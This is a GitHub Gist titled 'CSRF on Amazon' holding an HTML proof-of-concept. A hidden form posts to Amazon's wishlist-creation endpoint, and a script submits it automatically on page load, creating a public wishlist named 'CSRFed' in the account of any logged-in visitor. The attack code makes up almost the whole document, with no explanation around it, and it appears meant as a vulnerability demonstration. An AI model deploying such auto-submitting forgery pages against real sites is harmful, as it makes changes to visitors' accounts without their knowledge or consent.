Created
October 15, 2012 06:43
-
-
Save yujikosuga/3891102 to your computer and use it in GitHub Desktop.
CSRF on Amazon
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<body> | |
<form name="form" method="post" action="http://www.amazon.com/gp/registry/wishlist/ref=cm_wl_rlist_create"> | |
<input type="hidden" name="dest-list" value="new-wishlist"> | |
<input type="hidden" name="no-update" value="1"> | |
<input type="hidden" name="movecopy" value="createnew"> | |
<input type="hidden" name="sourceVendorId" value="website.wishlist.profile"> | |
<input type="hidden" name="list-name" value="CSRFed"> | |
<input type="hidden" name="isPrivate" value="N"> | |
<input type="hidden" name="submit.movecopy.x" value="35"> | |
<input type="hidden" name="submit.movecopy.y" value="14"> | |
</form> | |
<script> | |
document.form.submit(); | |
</script> | |
</body> | |
</html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment